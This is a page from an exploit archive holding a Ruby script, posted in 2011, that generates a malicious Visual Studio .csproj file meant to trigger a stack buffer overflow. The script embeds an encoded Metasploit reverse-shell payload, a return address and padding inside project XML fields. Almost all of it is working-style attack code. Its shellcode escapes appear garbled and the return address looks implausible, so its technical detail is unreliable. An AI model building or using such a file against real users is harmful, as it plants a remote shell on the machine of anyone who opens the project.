Home / exploitsPDF  

MS Visual Studio 9.0 .csproj Buffer Overflow

Posted on 26 February 2011

#!/usr/bin/ruby

###
# Title : MS Visual Studio 9.0 (.csproj) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Tested on : windows XP SP3 Français & Arabic
# Target :  Microsoft Visual Studio v 9.0 / CSharp Project /
###

# Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com

#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz")
system("color 1e")
system("cls")
def Usage()
puts "


[!] MS Visual Studio 9.0 (.csproj) 
"
puts "[!] Stack Buffer Overflow 
"
puts "[!] Author: KedAns-Dz 
"
puts "[!] E-mail: ked-h@hotmail.com 
"
end

# Payload Parameter (http://www.metasploit.com)
# windows/shell_reverse_tcp - 739 bytes
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
payload =
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" +
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" +
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" +
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" +
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" +
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" +
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" +
"x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" +
"x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" +
"x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" +
"x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" +
"x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" +
"x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" +
"x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" +
"x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" +
"x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" +
"x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" +
"x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" +
"x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" +
"x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" +
"x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" +
"x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" +
"x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" +
"x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" +
"x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" +
"x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" +
"x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" +
"x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" +
"x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" +
"x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" +
"x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" +
"x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" +
"x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" +
"x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" +
"x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" +
"x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" +
"x50x43x30x47x71x43x58x43x32x45x50x44x51x43" +
"x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" +
"x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" +
"x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" +
"x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" +
"x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" +
"x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" +
"x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" +
"x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" +
"x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" +
"x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" +
"x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" +
"x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" +
"x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" +
"x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" +
"x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" +
"x7ax47x70x46x33x4bx4fx49x45x41x41" #_ End Payload _

# Parameter OverFlow =>
amt = "A" * 333 + "-"
bmt = "B" * 333 + "-"
cmt = "C" * 333
buff = amt + bmt + cmt # Buffer GID
ret = [0x000004b0].pack('V') #  Jump to ESP - from MSVS.ORDesigner.DslPackage.dll
junk = "x4b" * 500 # junk
padd = "x90" * 30 # Padding
# KedAns = [Payload_shell][RET: 0x000004b0][Padding][Junk]
KedAns = payload + ret + padd + junk

# Parameter Evil File =>
ked = %Q{<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="3.5">
<PropertyGroup>

<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>

<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>

<SchemaVersion>2.0</SchemaVersion>

<ProjectGuid>{#{buff}}</ProjectGuid>

<OutputType>Library</OutputType>

<StartupObject>
#{junk}
</StartupObject>

</PropertyGroup>

<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">

<DebugSymbols>true</DebugSymbols>

<Optimize>false</Optimize>

<OutputPath>.inDebug</OutputPath>

</PropertyGroup>
<ItemGroup>
<Reference Include="System"/>

<Reference Include="#{KedAns}"/>

</ItemGroup>

<Compile Include="KedAns-Dz.cs">
<SubType>Code</SubType>
</Compile>
</ItemGroup>
</Project>
} # _ End Parameter File _
# >> Creating ...
evil = File.new("KedAns.csproj","wb") # Evil file (CSharp.Project)
evil.write(ked)
evil.close

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians <  [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) *  MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
#  Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================

 

TOP

Malware :

Exploits :